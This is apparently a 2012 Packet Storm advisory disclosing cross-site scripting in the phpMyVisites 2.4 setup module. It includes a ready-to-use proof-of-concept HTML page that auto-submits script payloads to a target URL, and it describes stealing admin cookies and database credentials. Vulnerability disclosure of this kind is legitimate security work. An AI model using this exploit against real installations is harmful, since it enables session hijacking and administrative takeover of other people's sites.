what you don't know can hurt you

phpMyVisites 2.4 Cross Site Scripting

phpMyVisites 2.4 Cross Site Scripting
Posted Mar 9, 2012
Authored by Akastep

phpMyVisites version 2.4 suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
MD5 | 0d613768ff187302eb16f044d410544d

phpMyVisites 2.4 Cross Site Scripting

Change Mirror Download
============================================================
Vulnerable Software:
phpMyVisites 2.4 (version.php 238 2009-12-16 19:48:15Z matthieu_ $
More info can be found here: http://www.phpmyvisites.us/
============================================================
============================================================
phpMyVisites 2.4 Is vulnerable to Cross Site Scripting attack.
============================================================
Tested on: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version()
-> ;
+-----------+
| version() |
+-----------+
| 5.5.21 |
+-----------+
*/
============================================================
Vuln Desc:
Problem in that: phpMyVisites 2.4 after installation doesn't requires
uninstalling of setup module.(Only administrator can access this module)
(phpmv2/index.php?mod=install_database_setup)
Which is prone to Cross site Scripting vulnerability due insufficent sanitization:

Note: Attack Scenario:
A) Admin logins to system.(needs authentication)
B) And clicks on crafted link (below you can see it -Proof Of Concept exploit)
Successfully attack exploitation may result of stealing currently logged administrator's cookies which using it attacker
can login system as admin and reinstall application (overwrite installation)),
or steal database credentials(because this script fills inputs automatically from config) which is viewable
(only database password is MD5 encrypted in inputbox and can be viewed from source code of page as MD5 encrypted)

Also I noticed it's cookies doesn't expires after succesfully *logging out*.
So stealed cookies can be used as "backdoor" to access system again.

============================================================



=============== PROOF OF CONCEPT EXPLOIT ==================
<html>
<head>
<title>Warning! This is Proof Of Concept Exploit for phpMyVisites 2.4 (version.php 238 2009-12-16 19:48:15Z matthieu_ $)</title>
</head>
<h1> Warning! This is a Proof Of Concept Exploit for phpMyVisites 2.4:<br/></h1>
<p>// $Id: version.php 238 2009-12-16 19:48:15Z matthieu_ $
PHPMV_VERSION 2.4
</p>


</h1>
<body onload="javascript:document.forms[0].submit()">

<form action="http://CHANGE_TO_RTARGET/phpmv2/index.php?mod=install_database_setup" method="post" name="form_phpmv" id="form_phpmv">


<input value="<script>alert(document.cookie);</script>" name="form_dblogin" type="hidden" />
<input value="<script>alert(document.cookie);</script>" name="form_dbpassword" type="hidden" />
<input value="<script>alert(document.cookie);</script>" name="form_dbhost" type="hidden" />
<input value="<script>alert(document.cookie);</script>" name="form_dbname" type="hidden" />
<input value="<script>alert(document.cookie);</script>" name="form_dbprefix" type="hidden"/></td>

<!--- Author: AkaStep -->
</form>
</body>
</html>

===============EOF PROOF OF CONCEPT EXPLOIT ==================

Print screen:

http://s018.radikal.ru/i505/1203/ba/26343fa7963b.png

================================================================


/AkaStep ^_^


1331239741




Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    38 Files
  • 3
    Sep 3rd
    30 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    12 Files
  • 6
    Sep 6th
    17 Files
  • 7
    Sep 7th
    3 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    24 Files
  • 10
    Sep 10th
    22 Files
  • 11
    Sep 11th
    22 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    5 Files
  • 14
    Sep 14th
    2 Files
  • 15
    Sep 15th
    1 Files
  • 16
    Sep 16th
    11 Files
  • 17
    Sep 17th
    16 Files
  • 18
    Sep 18th
    8 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close